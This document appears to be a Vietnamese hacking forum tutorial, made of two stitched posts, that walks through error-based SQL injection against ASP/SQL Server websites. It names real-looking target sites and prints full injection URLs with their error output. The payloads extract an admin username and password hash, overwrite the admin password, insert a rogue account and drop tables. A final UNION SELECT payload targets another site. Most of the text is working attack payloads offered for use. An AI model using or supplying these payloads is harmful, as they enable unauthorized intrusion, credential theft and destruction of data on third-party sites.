Hơm nay, theo u cầu số bạn, làm tut này, mong ủng hộ bạn : 84: ok, victim: Code: http://www.thitruongdatviet.com/thitruongdatviet/chitiettintuc.asp? ID=615 bị lỗi Advanced sql injection, tùy theo lỗi mà bạn áp dụng nhá :18: thui, bắt đầu link lỗi: Code: http://www.thitruongdatviet.com/thitruongdatviet/chitiettintuc.asp? ID=615' phun lỗi nè : Code: Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string '' /thitruongdatviet/chitiettintuc.asp, line 50 ok, ta bắt đầu khai thác Code: ; begin declare @emiu varchar(8000) set @emiu=':' select @emiu=@emiu %2btable_name%2b'/' from information_schema.tables select @emiu as id into hoangtan end với câu query trên, gom hết table vào table có tên hoangtan áp dụng Code: http://www.thitruongdatviet.com/thitruongdatviet/chitiettintuc.asp? ID=615; begin declare @emiu varchar(8000) set @emiu=':' select @emiu=@emiu%2btable_name%2b'/' from information_schema.tables select @emiu as id into hoangtan end ko lỗi jì, coi bạn thành cơng bước đầu cho table table hoangtan Code: or 1=(select id from hoangtan) áp dụng Code: http://www.thitruongdatviet.com/thitruongdatviet/chitiettintuc.asp? ID=615or 1=(select id from hoangtan) jì này, hết table :73: ta bắt đầu đoán table chứa info login nhá, tân đoán table amdin, thử :61: Code: http://www.thitruongdatviet.com/thitruongdatviet/chitiettintuc.asp? ID=615and = convert(int,(select top column_name from information_schema.columns where table_name =('ADMIN') and column_name not in (''))) sp_password đoạn query có nghĩa column table column nè Code: Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value 'User_Name' to a column of data type int /thitruongdatviet/chitiettintuc.asp, line 50 ta có User_Name column :73: tiếp thơi Code: http://www.thitruongdatviet.com/thitruongdatviet/chitiettintuc.asp? ID=615and = convert(int,(select top column_name from information_schema.columns where table_name =('ADMIN') and column_name not in ('User_Name'))) sp_password column thứ :61: Code: Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value 'PassWord' to a column of data type int /thitruongdatviet/chitiettintuc.asp, line 50 thích lấy hết column lấy, tân cần thui :29::83: ta get info column nhá Code: http://www.thitruongdatviet.com/thitruongdatviet/chitiettintuc.asp? ID=615and = convert(int,(select top User_Name from ADMIN))-sp_password hì hì, lồi nhá Code: Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value 'hoanglienson' to a column of data type int /thitruongdatviet/chitiettintuc.asp, line 50 username : hoanglienson mị típ pass Code: http://www.thitruongdatviet.com/thitruongdatviet/chitiettintuc.asp? ID=615and = convert(int,(select top PassWord from ADMIN))-sp_password pass nè :95: Code: Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value '40c72ddbf251c6ccaab3869d2b97690fd206ad3b808ce993ce6ca2c5fd602721' to a column of data type int /thitruongdatviet/chitiettintuc.asp, line 50 pass bị mã hóa rồi, :19: thui, ta tiếp tục update pass chơi :61: Code: update table set column ='pass hash' where column ='ten tim dc' tự tìm hiểu nhá :7: Code: http://www.thitruongdatviet.com/thitruongdatviet/chitiettintuc.asp? ID=615update ADMIN set PassWord ='e10adc3949ba59abbe56e057f20f883e' where User_Name ='hoanglienson' hok báo lỗi, thành cơng, tìm link đăng nhập thui, tân làm tới dây nhá :40: tut by hoangtan2312 Hướng dẫn hack lỗi SQL Các bạn tìm web bị dính lỗi SQL: victim: ví dụ thơi Code: http://www.thanggiangho.com/products.asp?id=44' (hack=cách truy vấn)(query) Đầu tiên Bước 1: get table_name Các bạn gắn đoạn mã sau vào sau site bị lỗi Code: and 1=convert(int,(select top table_name from information_schema.tables where table_name not in(''))) sp_password lưu ý dấu ' có ko -Nếu tìm table_name ví dụ table1 Check table nó: Code: and 1=convert(int,(select top table_name from information_schema.tables where table_name not in('table1')))-sp_password cư table_name chứa thơng tin admin vd:tbladmin,admin,user,tbuser Bước 2: Get column Tìm table_name chưa thông tin admin rồi,ta tiến hành get column_name giả sử table1 chứa thông tin admin Code: and 1=convert(int,(select top column_name from information_schema.columns where table_name='table1')) sp_password vd ta tìm column thứ table1 username Tiếp tục get column thứ table1: Code: and 1=convert(int,(select top column_name from information_schema.columns where table_name='table1' and column_name not in('username'))) sp_password Nếu tìm username/password table1 ta check pass Bước 3: Check pass table_name table1 column_name table1 : username/password Code: and 1=convert(int,(select top username%2b'/'%2bpassword from table1)) sp_password Xong pass Giờ việc tìm link admin nó: get link admin có thê sử dụng tool scan pác X số query khác: -Tạo table_name: Code: ;drop table thanggiangho create table thanggiangho (id int identity,hce_group varchar(99)) insert into thanggiangho select table_name from information_schema.tables sp_password -Thay đổi pass admin: lấy vd username : thang/pass:giangho Code: ;UPDATE table1 SET password = 'pass mới' WHERE username='thang' -Chèn record vào table Code: ;INSERT INTO 'table1' ('ID', 'username', 'password', 'details') VALUES (99,'thang2','giangho2','NA') -Tìm tất table có liên quan như: admin,user,member,account,login < tia pác ML Code: and = convert(int,(select top table_name from information_schema.tables where table_name like '%admin%' or table_name like '%Member%' or table_name like '%User%' or table_name like '%account %' or table_name like '%login%')) sp_password Update by ML: Code: and = convert(int,(select top table_name from information_schema.tables where table_name not in ('') and (table_name like '%25admin%25' or table_name like '%25Member%25' or table_name like '%25User%25' or table_name like '%25account%25' or table_name like '%25login%25'))) sp_password Bổ sung thêm: -Lấy tất table_name: Code: ; begin declare @temp varchar(8000) set @temp=':' select @temp=@temp %2btable_name%2b'/' from information_schema.tables select @temp as id into thanggiangho end Code: or 1=(select id from thanggiangho) Code: ; drop table thanggiangho -Lấy tất column_name từ table_name: vd table_name : tbadmin Code: ; begin declare @temp varchar(8000) set @temp=':' select @temp=@temp %2bcolumn_name%2b'/' from information_schema.columns where table_name='tbadmin' select @temp as id into thanggiangho end Code: or 1=(select id from thanggiangho) tới nha http://www.mondeveloppeur.com/tst/index.php? option=com_adress&Itemid=31&exe=View&pid=82%20UniOn%20SeLeCt %201,2,unhex(hex(table_name)),4,5,6,7,8,9,10,11,12%20from %20information_schema.tables &publish=1